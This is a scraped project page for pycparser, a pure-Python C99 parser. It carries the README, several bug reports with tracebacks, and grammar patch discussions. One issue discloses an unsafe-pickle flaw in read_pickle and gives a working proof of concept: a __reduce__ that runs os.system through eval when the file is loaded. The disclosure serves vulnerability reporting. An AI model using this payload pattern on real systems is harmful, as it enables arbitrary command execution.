:snake: Complete C99 parser in pure Python

Overview

pycparser v2.20


1   Introduction

1.1   What is pycparser?

pycparser is a parser for the C language, written in pure Python. It is a module designed to be easily integrated into applications that need to parse C source code.

1.2   What is it good for?

Anything that needs C code to be parsed. The following are some uses for pycparser, taken from real user reports:

  • C code obfuscator
  • Front-end for various specialized C compilers
  • Static code checker
  • Automatic unit-test discovery
  • Adding specialized extensions to the C language

One of the most popular uses of pycparser is in the cffi library, which uses it to parse the declarations of C functions and types in order to auto-generate FFIs.

pycparser is unique in the sense that it's written in pure Python - a very high level language that's easy to experiment with and tweak. To people familiar with Lex and Yacc, pycparser's code will be simple to understand. It also has no external dependencies (except for a Python interpreter), making it very simple to install and deploy.

1.3   Which version of C does pycparser support?

pycparser aims to support the full C99 language (according to the standard ISO/IEC 9899). Some features from C11 are also supported, and patches to support more are welcome.

pycparser supports very few GCC extensions, but it's fairly easy to set things up so that it parses code with a lot of GCC-isms successfully. See the FAQ for more details.

1.4   What grammar does pycparser follow?

pycparser very closely follows the C grammar provided in Annex A of the C99 standard (ISO/IEC 9899).

1.5   How is pycparser licensed?

BSD license.

1.6   Contact details

For reporting problems with pycparser or submitting feature requests, please open an issue, or submit a pull request.

2   Installing

2.1   Prerequisites

  • pycparser was tested on Python 2.7, 3.4-3.6, on both Linux and Windows. It should work on any later version (in both the 2.x and 3.x lines) as well.
  • pycparser has no external dependencies. The only non-stdlib library it uses is PLY, which is bundled in pycparser/ply. The current PLY version is 3.10, retrieved from http://www.dabeaz.com/ply/

Note that pycparser (and PLY) uses docstrings for grammar specifications. Python installations that strip docstrings (such as when using the Python -OO option) will fail to instantiate and use pycparser. You can try to work around this problem by making sure the PLY parsing tables are pre-generated in normal mode; this isn't an officially supported/tested mode of operation, though.

2.2   Installation process

Installing pycparser is very simple. Once you download and unzip the package, you just have to execute the standard python setup.py install. The setup script will then place the pycparser module into site-packages in your Python's installation library.

Alternatively, since pycparser is listed in the Python Package Index (PyPI), you can install it using your favorite Python packaging/distribution tool, for example with:

> pip install pycparser

2.3   Known problems

  • Some users who've installed a new version of pycparser over an existing version ran into a problem using the newly installed library. This has to do with parse tables staying around as .pyc files from the older version. If you see unexplained errors from pycparser after an upgrade, remove it (by deleting the pycparser directory in your Python's site-packages, or wherever you installed it) and install again.

3   Using

3.1   Interaction with the C preprocessor

In order to be compilable, C code must be preprocessed by the C preprocessor - cpp. cpp handles preprocessing directives like #include and #define, removes comments, and performs other minor tasks that prepare the C code for compilation.

For all but the most trivial snippets of C code pycparser, like a C compiler, must receive preprocessed C code in order to function correctly. If you import the top-level parse_file function from the pycparser package, it will interact with cpp for you, as long as it's in your PATH, or you provide a path to it.

Note also that you can use gcc -E or clang -E instead of cpp. See the using_gcc_E_libc.py example for more details. Windows users can download and install a binary build of Clang for Windows from this website.

3.2   What about the standard C library headers?

C code almost always #includes various header files from the standard C library, like stdio.h. While (with some effort) pycparser can be made to parse the standard headers from any C compiler, it's much simpler to use the provided "fake" standard includes in utils/fake_libc_include. These are standard C header files that contain only the bare necessities to allow valid parsing of the files that use them. As a bonus, since they're minimal, it can significantly improve the performance of parsing large C files.

The key point to understand here is that pycparser doesn't really care about the semantics of types. It only needs to know whether some token encountered in the source is a previously defined type. This is essential in order to be able to parse C correctly.

See this blog post for more details.

Note that the fake headers are not included in the pip package nor installed via setup.py (#224).

3.3   Basic usage

Take a look at the examples directory of the distribution for a few examples of using pycparser. These should be enough to get you started. Please note that most realistic C code samples would require running the C preprocessor before passing the code to pycparser; see the previous sections for more details.

3.4   Advanced usage

The public interface of pycparser is well documented with comments in pycparser/c_parser.py. For a detailed overview of the various AST nodes created by the parser, see pycparser/_c_ast.cfg.

There's also a FAQ available here. In any case, you can always drop me an email for help.

4   Modifying

There are a few points to keep in mind when modifying pycparser:

  • The code for pycparser's AST nodes is automatically generated from a configuration file - _c_ast.cfg, by _ast_gen.py. If you modify the AST configuration, make sure to re-generate the code.
  • Make sure you understand the optimized mode of pycparser - for that you must read the docstring in the constructor of the CParser class. For development you should create the parser without optimizations, so that it will regenerate the Yacc and Lex tables when you change the grammar.

5   Package contents

Once you unzip the pycparser package, you'll see the following files and directories:

README.rst:
This README file.
LICENSE:
The pycparser license
setup.py:
Installation script
examples/:
A directory with some examples of using pycparser
pycparser/:
The pycparser module source code.
tests/:
Unit tests.
utils/fake_libc_include:
Minimal standard C library include files that should allow to parse any C code.
utils/internal/:
Internal utilities for my own use. You probably don't need them.

6   Contributors

Some people have contributed to pycparser by opening issues on bugs they've found and/or submitting patches. The list of contributors is in the CONTRIBUTORS file in the source distribution. After pycparser moved to Github I stopped updating this list because Github does a much better job at tracking contributions.

Issues
  • Don't fail if docstrings are disabled

    Don't fail if docstrings are disabled

    The attribute __doc__ will return None if running CPython in -OO mode as it discards docstrings.

    FYI, this broke builds for me because cryptography uses cffi which uses pycparser at install time, and always pulls the latest version regardless of any dependency pinning in requirements.txt. It would be nice to prioritize this getting in a release ASAP to fix this issue.

    opened by dsanders11 29
  • pycparser-2.14-py2.py3-none-any.whl causes AssertionError: sorry, but this version only supports 100 named groups

    pycparser-2.14-py2.py3-none-any.whl causes AssertionError: sorry, but this version only supports 100 named groups

    Looks like pycparser-2.14-py2.py3-none-any.whl is broken or something misconfigured, while pycparser-2.14.tar.gz is ok. After installing a Snowflake Connector for Python, a connector for Snowflake DB, this error happen:

    >pip install -U snowflake-connector-python
    >python -c "import snowflake.connector"
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/__init__.py", line 21, in <module>
        from .connection import SnowflakeConnection
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/connection.py", line 16, in <module>
        from .cursor import SnowflakeCursor
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/cursor.py", line 30, in <module>
        from .file_transfer_agent import (SnowflakeFileTransferAgent)
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/file_transfer_agent.py", line 29, in <module>
        from .s3_util import (SnowflakeS3FileEncryptionMaterial, SnowflakeS3Util,
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/s3_util.py", line 25, in <module>
        from Crypto.Cipher import AES
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Cipher/__init__.py", line 78, in <module>
        from Crypto.Cipher._mode_ecb import _create_ecb_cipher
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Cipher/_mode_ecb.py", line 29, in <module>
        from Crypto.Util._raw_api import (load_pycryptodome_raw_lib,
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Util/_raw_api.py", line 89, in <module>
        Array = ffi.new("char[1]").__class__.__bases__
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 248, in new
        cdecl = self._typeof(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 168, in _typeof
        result = self._typeof_locked(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 153, in _typeof_locked
        type = self._parser.parse_type(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 448, in parse_type
        return self.parse_type_and_quals(cdecl)[0]
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 451, in parse_type_and_quals
        ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2]
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 260, in _parse
        ast = _get_parser().parse(csource)
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 40, in _get_parser
        _parser_cache = pycparser.CParser()
      File "/tmp/t/lib/python2.7/site-packages/pycparser/c_parser.py", line 87, in __init__
        outputdir=taboutputdir)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/c_lexer.py", line 66, in build
        self.lexer = lex.lex(object=self, **kwargs)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/ply/lex.py", line 911, in lex
        lexobj.readtab(lextab, ldict)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/ply/lex.py", line 233, in readtab
        titem.append((re.compile(pat, lextab._lexreflags | re.VERBOSE), _names_to_funcs(func_name, fdict)))
      File "/tmp/t/lib/python2.7/re.py", line 194, in compile
        return _compile(pattern, flags)
      File "/tmp/t/lib/python2.7/re.py", line 249, in _compile
        p = sre_compile.compile(pattern, flags)
      File "/tmp/t/lib/python2.7/sre_compile.py", line 583, in compile
        "sorry, but this version only supports 100 named groups"
    AssertionError: sorry, but this version only supports 100 named groups
    

    But if I install it from source pycparser-2.14.tar.gz, it works

    >pip install -U ~/Downloads/pycparser-2.14.tar.gz
    Processing /Users/stakeda/Downloads/pycparser-2.14.tar.gz
    Building wheels for collected packages: pycparser
      Running setup.py bdist_wheel for pycparser ... done
      Stored in directory: /Users/stakeda/Library/Caches/pip/wheels/6e/f1/96/de2b8478c77d89fe540a5709a70e2cdc4e7331a3543cada3c1
    Successfully built pycparser
    Installing collected packages: pycparser
      Found existing installation: pycparser 2.13
        Uninstalling pycparser-2.13:
          Successfully uninstalled pycparser-2.13
    Successfully installed pycparser-2.14
    >python -c "import snowflake.connector"
    >
    

    Could you rebuild a new wheel or remove it? Thanks.

    opened by smtakeda 18
  • Fix parsing TYPEIDs in declarators

    Fix parsing TYPEIDs in declarators

    This fixes the parsing of TYPEIDs in declarators (and related expressions) once and for all, removing existing workarounds for specific cases of the problem. In particular, it solves the problem in the current parser where a TYPEID is used in a list of multiple declarators, for which there is no workaround.

    All tests are passing for me, and I added 2 more tests related to parsing declarators correctly.

    I've tried to organize the commits as logically and discretely as possible to make it clear what is happening in each step:

    1. Remove workaround productions
    2. Allow TYPEIDs in declarators
    3. Restrict declaration-specifiers and specifier-qualifier-list to contain at least one type-specifier, and only one if it is a typedef-name
    4. Force parameter-declarations to interpret a TYPEID as a typedef-name in cases of ambiguity

    It is likely there is some more leftover "workaround" code that can removed, but I decided it was best to do the PR as-is for now, as that may take some careful thought (and maybe more tests to ensure no change in behavior).

    opened by natezb 16
  • Implement `_Atomic` support

    Implement `_Atomic` support

    As mentioned in https://github.com/eliben/pycparser/pull/428 we need _Atomic keyword support for C11. This keyword is rather special, as it can be both a qualifier and a specifier. C standard provides two grammar definitions for this:

    (6.7.2) type-specifer:
      void
      char
      short
      int
      long
      float
      double
      signed
      unsigned
      _Bool
      _Complex
      atomic-type-specifer
      struct-or-union-specifer
      enum-specifer
      typedef-name
    
    (6.7.2.4) atomic-type-specifer:
      _Atomic ( type-name )
    
    (6.7.3) type-qualifer:
      const
      restrict
      volatile
      _Atomic
    

    Depending on whether the _Atomic keyword is a specifier or a qualifier it refers to an atomic type. The atomic type can contain another atomic type, i.e. define nested atomic types, and it can also refer to specific parts of the type. As mentioned in the original PR all the following examples are valid:

    _Atomic(int *) a;
    _Atomic(int) *b;
    _Atomic int *c;
    

    All these samples need to generate different code after being parsed through pycparser and converted back to C, so the implementation needs to treat _Atomic qualifier and specifier separately. My suggestion is to follow the grammar of the C standard and use a normal qualifier for _Atomic qualifier, and a dedicated class like with enum.

    opened by vit9696 14
  • Publish sdist and bdist wheel

    Publish sdist and bdist wheel

    The benefits of wheels are well documented. See: https://pythonwheels.com/ This package is pure Python and publishing it as both source and as a wheel is simple.

    Would you accept a contribution to add a Makefile to this repo that would allow you to build both source distribution (sdist) and built distribution (wheel)?

    opened by groodt 14
  • pycparser 2.18+ break pygit2

    pycparser 2.18+ break pygit2

    ____________________ ERROR collecting test/test_archive.py _____________________
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:174: in _typeof
        result = self._parsed_types[cdecl]
    E   KeyError: 'int (*git_transport_certificate_check_cb)(git_cert *cert, int valid, const char *host, void *payload)'
    During handling of the above exception, another exception occurred:
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:276: in _parse
        ast = _get_parser().parse(fullcsource)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/c_parser.py:152: in parse
        debug=debuglevel)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:331: in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:1199: in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:193: in call_errorfunc
        r = errorfunc(token)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/c_parser.py:1848: in p_error
        column=self.clex.find_tok_column(p)))
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/plyparser.py:67: in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    E   pycparser.plyparser.ParseError: <cdef source string>:2:7: before: git_transport_certificate_check_cb
    During handling of the above exception, another exception occurred:
    test/test_archive.py:36: in <module>
        from pygit2 import Index, Oid, Tree, Object
    pygit2/__init__.py:41: in <module>
        from .remote import Remote, RemoteCallbacks, get_credentials
    pygit2/remote.py:73: in <module>
        class RemoteCallbacks(object):
    pygit2/remote.py:315: in RemoteCallbacks
        @ffi.callback('int (*git_transport_certificate_check_cb)'
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:382: in callback
        cdecl = self._typeof(cdecl, consider_function_as_funcptr=True)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:177: in _typeof
        result = self._typeof_locked(cdecl)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:162: in _typeof_locked
        type = self._parser.parse_type(cdecl)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:476: in parse_type
        return self.parse_type_and_quals(cdecl)[0]
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:479: in parse_type_and_quals
        ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2]
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:278: in _parse
        self.convert_pycparser_error(e, csource)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:307: in convert_pycparser_error
        raise CDefError(msg)
    E   cffi.error.CDefError: cannot parse "int (*git_transport_certificate_check_cb)(git_cert *cert, int valid, const char *host, void *payload)"
    E   <cdef source string>:2:7: before: git_transport_certificate_check_cb
    

    I'm pretty sure somebody did report a bug, but I can't find it..

    opened by ignatenkobrain 13
  • read_pickle method is vulnerable

    read_pickle method is vulnerable

    import pickle
    class joel_test(object):
        def __reduce__(self):
            return eval, ("os.system('calc.exe')",)
    test = joel_test()
    f=open('joel_test','wb')
    pickle.dump(test,f)
    f.close()
    joel=LRTable()
    joel.read_pickle('joel_test')
    

    Hi, there is a vulnerability in read_pickle method in yacc.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.

    opened by Joel-MalwareBenchmark 12
  • Support for Weakref in __slots__

    Support for Weakref in __slots__

    Hello, I see you added support for the slots mechanism in the ast. Nice. However, this breaks cffi downstream, since they use weak references to Enum, etc objects (see their cparser.py file). In turn this breaks petlib which I maintain. I think the solution is to include the "weakref" in the "slots" list of fields, as per the advice at: https://docs.python.org/2/reference/datamodel.html#slots Many thanks, George

    bug 
    opened by gdanezis 11
  • Redeclared types

    Redeclared types

    While using pycparser to parse a large, existing codebase, I immediately came upon the typedef-name problem. The changes in this pull request resolve and test for the issues encountered; in particular:

    • Reusing typedef names as structure/union member names
    • Reusing typedef names as variables names in inner scopes
    • Reusing typedef names as parameter names in declarations and definitions
    • Duplicated typedef declarations (non-standard, but apparently common and syntactically similar to the above)

    There is a corner case regarding parameter name scoping that required access to yacc.py's lookahead token (see p_direct_declarator_5 in c_parser.py for details). There are three solutions as I see it:

    • Modify yacc.py to expose the lookahead token as an attribute of the parser (...but requiring future PLY updates to be merged, not copied)
    • Keep track of the most-recent token via a custom tokenfunc (...but trusting that the parser's lookaheadstack is empty)
    • Use the inspect module to grab the value of the parser's lookahead variable (...but direct inspection of Python frames and local dictionaries is pretty evil)

    For the purpose of this change I decided to use the inspect module, as it is the least error-prone (it can inspect lookaheadstack to ensure it's empty) and the least invasive to the codebase. I can instead make lookahead/lookaheadstack attributes, if you're willing to support the merging of PLY.

    opened by Syeberman 11
  • ParseError while using gcc_E_lib example to parse my C code

    ParseError while using gcc_E_lib example to parse my C code

    Trying to parse the following c file

    #include <stdio.h>
    #include <stdlib.h>
    #include <ctype.h>
    
    #define  MaxElements 16
    
    typedef float HeapElementType;
    
    typedef  struct {
         HeapElementType key;
    } HeapNode;
    
    typedef struct {
            int Size;
            HeapNode Element[MaxElements+1];
    } HeapType;
    
    typedef enum {
        FALSE, TRUE
    } boolean;
    
    void CreateMinHeap(HeapType *Heap);
    boolean FullHeap(HeapType Heap);
    void InsertMinHeap(HeapType *Heap, HeapNode Item);
    boolean EmptyHeap(HeapType Heap);
    void DeleteMinHeap(HeapType *Heap, HeapNode *Item);
    void PrintHeap(HeapType Heap);
    
    int main()
    {
        HeapType AHeap;
        HeapNode AnItem;
        int m;
        FILE *fp;
    
        printf("Give m: ");
        scanf("%d", &m);
    
        CreateMinHeap(&AHeap);
    
        fp=fopen("transactions.txt","r");
    
        while(!feof(fp))
        {
            fscanf(fp, "%f", &AnItem.key);
            InsertMinHeap(&AHeap, AnItem);
            if(AHeap.Size>m)
                DeleteMinHeap(&AHeap, &AnItem);
        }
    
        PrintHeap(AHeap);
    
        printf("Transactions\n");
        while(!EmptyHeap(AHeap))
        {
            DeleteMinHeap(&AHeap, &AnItem);
            printf("%.2f ", AnItem.key);
        }
    
        return 0;
    }
    
    void CreateMinHeap(HeapType *Heap)
    {
      (*Heap).Size=0;
    }
    
    boolean EmptyHeap(HeapType Heap)
    {
      return (Heap.Size==0);
    }
    
    boolean FullHeap(HeapType Heap)
    {
      return (Heap.Size==MaxElements);
    }
    
    
    void PrintHeap(HeapType Heap)
    {
        int i;
        printf("Data Structure size =%d\n", Heap.Size);
        for(i=1;i<=Heap.Size;i++)
            printf("%.2f ", Heap.Element[i].key);
        printf("\n");
    }
    
    

    and get this error

    _error raise ParseError("%s: %s" % (coord, msg)) pycparser.plyparser.ParseError: /usr/lib/gcc/x86_64-pc-linux-gnu/11.1.0/include/stdarg.h:40:27: before: __gnuc_va_list

    opened by tassosblackg 10
  • offsetof() support is incomplete

    offsetof() support is incomplete

    pycparser 2.13 added support for offsetof, and it is listed in the CHANGES file as "offsetof() the way gcc implements it". However, there are two differences between gcc's implemenation and pycparser's.

    The important one: pycparser defines the syntax for offsetof() as

            primary_expression  : OFFSETOF LPAREN type_name COMMA identifier RPAREN
    

    but gcc defines it as

         primary:
                 "__builtin_offsetof" "(" typename "," offsetof_member_designator ")"
    
         offsetof_member_designator:
                   identifier
                 | offsetof_member_designator "." identifier
                 | offsetof_member_designator "[" expr "]"
    
    

    The less important one (also visible above) is that gcc supports spelling offsetof as __builtin_offsetof.

    opened by shai-xio 10
  • Named initializer AST is ambiguous for [ENUMERATOR] = ... vs .prop = ...

    Named initializer AST is ambiguous for [ENUMERATOR] = ... vs .prop = ...

    struct A { int x; };
    struct A a = {
        .x = 1
    };
    

    and

    enum { x };
    int a[] = {
        [x] = 1
    };
    

    both result in a Decl with

    init=InitList(exprs=[NamedInitializer(name=[ID(name='x')],
                                          expr=Constant(type='int', value='1'))]),
    

    (The serializer choses to emit .x = 1 in this case.)

    patches-welcome 
    opened by simonlindholm 0
  • Error using pycparser with C code that calls OpenSSL

    Error using pycparser with C code that calls OpenSSL

    Hi,

    I'm trying to use pycparser with an application that uses OpenSSL. Concretely, I'm using the OpenSSL digest demo in https://github.com/openssl/openssl/blob/master/demos/digest/EVP_MD_xof.c.

    I'm pre-processing the file with the command gcc -I../../include -I../../../pycparser/utils/fake_libc_include -E EVP_MD_xof.c, where the first include refers to the OpenSSL libraries and the second include refers to pycparser itself. Then, when trying to parse the file using the parse_file command, I get the error

    Traceback (most recent call last):
      File "/Users/vm2p/Documents/repositories/pycparser/examples/rewrite_ast.py", line 25, in <module>
        ast = parse_file("/Users/vm2p/Documents/repositories/openssl/demos/digest/test.c", use_cpp=True)
      File "/usr/local/lib/python3.9/site-packages/pycparser/__init__.py", line 90, in parse_file
        return parser.parse(text, filename)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 147, in parse
        return self.cparser.parse(
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 331, in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 1199, in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 193, in call_errorfunc
        r = errorfunc(token)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 1931, in p_error
        self._parse_error(
      File "/usr/local/lib/python3.9/site-packages/pycparser/plyparser.py", line 67, in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    pycparser.plyparser.ParseError: ../../include/openssl/safestack.h:205:256: before: (
    

    I opened the safestack.h file from the OpenSSL distribution and between lines 250 and 256 there are a bunch of macro definitions. I've attached such file to this issue. Is this something that is not supported by pycparser? Or am I doing something wrong? I also attached the EVP_MD_xof.c as test.c.

    I also tried to pre-process the file using just gcc -I../../include -E EVP_MD_xof.c, but then I get

    Traceback (most recent call last):
      File "/Users/vm2p/Documents/repositories/pycparser/examples/rewrite_ast.py", line 25, in <module>
        ast = parse_file("/Users/vm2p/Documents/repositories/openssl/demos/digest/test.c", use_cpp=True)
      File "/usr/local/lib/python3.9/site-packages/pycparser/__init__.py", line 90, in parse_file
        return parser.parse(text, filename)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 147, in parse
        return self.cparser.parse(
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 331, in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 1199, in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 193, in call_errorfunc
        r = errorfunc(token)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 1931, in p_error
        self._parse_error(
      File "/usr/local/lib/python3.9/site-packages/pycparser/plyparser.py", line 67, in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    pycparser.plyparser.ParseError: /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/i386/_types.h:98:27: before: __darwin_va_list
    

    The resulting file is also attached as test2.c.

    Thank you in advance!

    Archive.zip .

    pending-user-input 
    opened by vm2p 2
  • A source distribution install can generates .pyc files with stale bytecode

    A source distribution install can generates .pyc files with stale bytecode

    Steps to reproduce: use --no-binary option to force pip to use the .tar.gz distribution instead of the wheel (the problem doesn't occur when using a wheel install)

    python3 -m pip install pycparser --no-binary=:all:

    Then the file pycparser/__pycache__/c_ast.cpython-39.pyc is stale and needs to be recompiled (a bad mtime header gets burnt into the pyc file).

    python3 -v -c "import pycparser" |& grep "stale\|bad mtime"
    # bytecode is stale for 'pycparser.c_ast'
    

    I guess the problem is somewhere inside _build_tables.py but I can't see what exactly.

    patches-welcome 
    opened by wimglenn 0
  • C code generator failures with multiple qualifiers

    C code generator failures with multiple qualifiers

    Sometimes C code generator fails "forgets" about qualifiers as shown in https://github.com/eliben/pycparser/pull/431. One such example is mixing _Atomic with const and auto. Consider the following code:

    self._assert_ctoc_correct('auto const _Atomic(int *) a;')
    

    This code would fail as it would generate auto int * _Atomic a; losing const. In particular, the issue is that CGenerator does not print quals for Decl. I.e. the following AST is generated:

    auto const _Atomic(int *) a;
    FileAST(ext=[Decl(name='a',
                      quals=['const'
                            ],
                      storage=['auto'
                              ],
                      funcspec=[
                               ],
                      type=PtrDecl(quals=['_Atomic'
                                         ],
                                   type=TypeDecl(declname='a',
                                                 quals=[
                                                       ],
                                                 type=IdentifierType(names=['int'
                                                                           ]
                                                                     )
                                                 )
                                   ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    and then the generator turns it into:

    auto int * _Atomic a;
    
    FileAST(ext=[Decl(name='a',
                      quals=[
                            ],
                      storage=['auto'
                              ],
                      funcspec=[
                               ],
                      type=PtrDecl(quals=['_Atomic'
                                         ],
                                   type=TypeDecl(declname='a',
                                                 quals=[
                                                       ],
                                                 type=IdentifierType(names=['int'
                                                                           ]
                                                                     )
                                                 )
                                   ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    An obvious fix is to add quals printing in def _generate_decl(self, n):.

    diff --git a/pycparser/c_generator.py b/pycparser/c_generator.py
    index ded8c65..5a977e5 100644
    --- a/pycparser/c_generator.py
    +++ b/pycparser/c_generator.py
    @@ -418,6 +418,7 @@ class CGenerator(object):
             s = ''
             if n.funcspec: s = ' '.join(n.funcspec) + ' '
             if n.storage: s += ' '.join(n.storage) + ' '
    +        if n.quals: s += ' '.join(n.quals) + ' '
             s += self._generate_type(n.type)
             return s
    

    But that route is a bit complicated as it leads to duplicating quals, e.g. _Atomic int x; gives _Atomic _Atomic int x; now. This feels wrong in the source, because I see the _Atomic qualifier is already present twice in the AST in the first place:

    FileAST(ext=[Decl(name='x',
                      quals=['_Atomic'
                            ],
                      storage=[
                              ],
                      funcspec=[
                               ],
                      type=TypeDecl(declname='x',
                                    quals=['_Atomic'
                                          ],
                                    type=IdentifierType(names=['int'
                                                              ]
                                                        )
                                    ),
                      init=None,
                      bitsize=None
                      )
                ]
            )
    

    However, it is not clear what was the original intention:

    1. To duplicate quals in both Decl and TypeDecl but use Decl for user interaction only for extra verbosity?
    2. To have different notions, with duplicated quals in some places being accidental?

    I tried prototyping writing a fix assuming it is (1), but it was not immediately successful as rather many tests started to fail, and the comparison did not work in the first place:

    diff --git a/pycparser/ast_transforms.py b/pycparser/ast_transforms.py
    index 367dcf5..f4f4786 100644
    --- a/pycparser/ast_transforms.py
    +++ b/pycparser/ast_transforms.py
    @@ -134,9 +134,16 @@ def fix_atomic_specifiers(decl):
         if typ.declname is None:
             typ.declname = decl.name
     
    +    return _fix_const_qualifiers(decl)
    +
    +def _fix_const_qualifiers(decl):
    +    if isinstance(decl, c_ast.Decl) and decl.quals:
    +        for qual in decl.quals:
    +            if qual not in decl.type.quals:
    +                decl.type.quals.append(qual)
    +        # decl.quals = []
         return decl
    
    patches-welcome 
    opened by vit9696 1
  • CGenerator doesn't consider the NOT operator when using reduce_parentheses=True

    CGenerator doesn't consider the NOT operator when using reduce_parentheses=True

    When using the CGenerator class with reduce_parentheses=True, the output still includes unnecessary parentheses around instances of UnaryOp with the NOT operator.

    For example:

    		      Input: if (a && !b && (!c || d)) …
    	     	     Output: if (a && (!b) && ((!c) || d)) …
                Expected Output: if (a && !b && (!c || d)) …
    

    To get around this, I just included UnaryOp in the list of simple nodes for _is_simple_node. Though, I'm not sure if this would have unexpected consequences. Another possible solution would be to include it in the precedence_map, but I couldn't get an ideal output doing it that way.

    enhancement patches-welcome 
    opened by Kyvski 2
  • Bug in token coordinates

    Bug in token coordinates

    I know this sounds like a really niche example, but it was made as simple as possible. This behavior is actually quite common with "strange" includes. Since I guess it's not the expected behavior and it's causing me a lot of problems in my analysis I wanted to know if it's possible to fix it.

    //FILE intval.h
    1
    
    // FILEmain.c
    int a =
    #include "intval.h" 
    ;
    
     int main() {  ;  }
    

    Ast show with coordinates:

    FileAST:  (at None)
      Decl <ext[0]>: a, [], [], [] (at C:/Users/Corrado/Desktop/main.c:1:5)
        TypeDecl <type>: a, [] (at C:/Users/Corrado/Desktop/main.c:1:5)
          IdentifierType <type>: ['int'] (at C:/Users/Corrado/Desktop/main.c:1:1)
        Constant <init>: int, 1 (at C:/Users/Corrado/Desktop/main.c:1:1)                <---------Coordinate is wrong
      FuncDef <ext[1]>:  (at C:/Users/Corrado/Desktop/main.c:5:6)
        Decl <decl>: main, [], [], [] (at C:/Users/Corrado/Desktop/main.c:5:6)
          FuncDecl <type>:  (at C:/Users/Corrado/Desktop/main.c:5:6)
            TypeDecl <type>: main, [] (at C:/Users/Corrado/Desktop/main.c:5:6)
              IdentifierType <type>: ['int'] (at C:/Users/Corrado/Desktop/main.c:5:2)
        Compound <body>:  (at C:/Users/Corrado/Desktop/main.c:5:1)
          EmptyStatement <block_items[0]>:  (at C:/Users/Corrado/Desktop/main.c:5:15)
    

    The pointed coordinate is wrong. Directives inserted by cpp preprocessor were right and reports correctly when i am entering and leaving the file.

    cpp -E output:

    # 1 "C:/Users/Corrado/Desktop/main.c"
    # 1 "<built-in>"
    # 1 "<command-line>"
    # 1 "C:/Users/Corrado/Desktop/main.c"
    int a =
    # 1 "C:/Users/Corrado/Desktop/intval.h" 1               <--------------entering
    1
    # 3 "C:/Users/Corrado/Desktop/main.c" 2              <----------------leaving
    ;
    
     int main() { ; }
    
    patches-welcome 
    opened by corradods 3
Owner
Eli Bendersky
Eli Bendersky
Analisador de strings feito em Python // String parser made in Python

Este é um analisador feito em Python, neste programa, estou estudando funções e a sua junção com "if's" e dados colocados pelo usuário. Neste código,

Dev Nasser 1 Nov 3, 2021
A simple but complete exercise to learning Python

ResourceReservationProject This is a simple but complete exercise to learning Python. Task and flow chart We are going to do a new fork of the existin

null 3 Dec 18, 2021
A complete python calculator with 2 modes Float and Int numbers.

Python Calculator This program is made for learning purpose. Getting started This Program runs using python, install it via terminal or from thier ofi

Felix Sanchez 1 Jan 18, 2022
A Gura parser implementation for Python

Gura parser This repository contains the implementation of a Gura format parser in Python. Installation pip install gura-parser Usage import gura gur

JWare Solutions 19 Jan 25, 2022
